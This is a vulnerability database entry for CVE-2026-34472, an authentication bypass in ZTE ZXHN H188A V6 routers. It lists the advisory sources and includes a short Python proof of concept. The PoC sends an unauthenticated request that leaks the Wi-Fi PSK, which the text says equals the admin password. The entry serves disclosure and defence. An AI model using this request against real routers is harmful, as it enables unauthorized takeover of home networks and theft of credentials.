📄 ZTE ZXHN H188A 6 Authentication Bypass / Credential Disclosure

🗓️ 20 May 2026 00:00:00Reported by Mina Nageh SalalmaType

Unauthenticated requests bypass QuickSetupEnable on ZTE ZXHN H188A V6, exposing WLAN PSKs, SSIDs and PPPoE usernames.

Reporter	Title	Published	Views	Family All 12
ATTACKERKB	CVE-2026-34472	30 Mar 202600:00	–	attackerkb
Circl	CVE-2026-34472	27 Mar 202623:26	–	circl
CNNVD	ZTE ZXHN H188A 安全漏洞	30 Mar 202600:00	–	cnnvd
CVE	CVE-2026-34472	30 Mar 202600:00	–	cve
Cvelist	CVE-2026-34472	30 Mar 202600:00	–	cvelist
Exploit DB	ZTE ZXHN H188A V6 - Authentication Bypass	29 May 202600:00	–	exploitdb
EUVD	EUVD-2026-17107	30 Mar 202618:31	–	euvd
NVD	CVE-2026-34472	30 Mar 202616:16	–	nvd
Packet Storm	📄 ZTE ZXHN H188A V6 Authentication Bypass	26 May 202600:00	–	packetstorm
Positive Technologies	PT-2026-29045	30 Mar 202600:00	–	ptsecurity

# Title: ZTE ZXHN H188A V6 - Authentication Bypass via Pre-Login Wizard
    Credential Leak
    # Date: 2026-05-20
    # Author: Mina Nageh Salalma (Monx Research)
    # CVE: CVE-2026-34472
    # Vendor: ZTE Corporation
    # Affected: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
    # Category: Remote / Webapps
    
    # Description:
    # Unauthenticated requests with _type parameter bypass the QuickSetupEnable
    # gate, exposing wizard handlers that return WLAN PSKs, SSIDs, PPPoE
    usernames.
    # Leaked Wi-Fi PSK == admin password after uppercasing = full auth bypass.
    #
    # MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34472
    # Write-up:
    https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
    
    # PoC:
    import requests
    data = {"IF_ACTION": "getPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
    "PASSTYPE": "PSK"}
    params = {"_type": "loginData", "_tag": "login_entry"}
    r = requests.post("http://TARGET_IP/", params=params, data=data,
    timeout=10, verify=False)
    print(r.text[:2000])

20 May 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.17.1

EPSS0.01979

SSVC